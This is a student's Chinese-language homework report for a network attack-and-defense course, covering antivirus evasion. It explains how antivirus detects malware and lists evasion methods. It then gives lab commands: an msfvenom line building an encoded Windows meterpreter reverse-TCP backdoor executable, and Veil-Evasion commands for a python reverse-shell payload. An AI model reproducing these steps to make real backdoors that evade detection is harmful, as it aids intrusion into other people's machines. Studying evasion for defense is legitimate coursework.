2017-2018-2 20179215《网络攻防实践》第十二周作业

2017-2018-2 20179215 《网络攻防实践》 第十二周作业 免杀技术

一、实验内容

（1）理解免杀技术原理

（2）正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧；

（3）通过组合应用各种技术实现恶意代码免杀

（4）用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

1.基础问题回答

（1）杀软是如何检测出恶意代码的？

• 正常行为分析法：正常行为分析常被应用于异常检测之中，是指对程序的正常行为轮廓进行分析和表示，为程序建立一个安全行为库，当被监测程序的实际行为与其安全行为库中的正常行为不一致或存在一定差异时，则可能为恶意代码

• 特征检测法：系统分析获取恶意代码通常具有明显特征码，当检测到代码含有特征码则可能为恶意代码

（2）免杀是做什么？

免杀是不会被杀毒软件软件杀掉的病毒或木马 是病毒的制作人 为了不让病毒被识别出来 通过钻杀毒软件漏洞或者将病毒伪装成正常程序的办法 来逃避杀毒软件的查杀。

（3）免杀的基本方法有哪些？

• 修改特征码：对恶意代码的特征码进行修改，比如添加一些指令，让杀软无法识别其是否为恶意代码

• 加花：通过添加加花指令（一些垃圾指令，类似加1减1之类的无用语句）让杀毒软件检测不到特征码。加花可以分为加区加花和去头加花

• 加壳：给原程序加上一段保护程序，有保护和加密功能，运行加壳后的文件先运行壳再运行真实文件，从而起到保护作用

二、实验过程

正确使用msf编码器，msfvenom生成如jar之类的其他文件，veil-evasion，自己利用shellcode编程等免杀工具或技巧。将文件传至http://www.virscan.org/进行检测

1.msf用编码器生成执行文件

（1）Kali输入命令

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=kali的IP LPORT=5324端口号 -f exe >自己起后门名字.exe

（2）将该程序上传到virscan扫描

文件信息：

扫描结果：

2.用Veil-Evasion生成可执行文件

（1）在Kali中安装veil，sudo apt-get install veil

（2）在Kali的终端中启动Veil-Evasion

命令行中输入veil，后在veil中输入命令use evasion

依次输入如下命令生成你的可执行文件：

use python/meterpreter/rev_tcp.py（设置payload）

set LHOST Kali的IP（设置反弹连接IP）

set LPORT 端口号（设置反弹端口）

generate 可执行文件名

（输出有错误！）

3.利用shellcode编程实现免杀

• 首先，在Kali上使用命令生成一个c语言格式的Shellcode数组。

• 编译运行产生a.out文件

• 扫描文件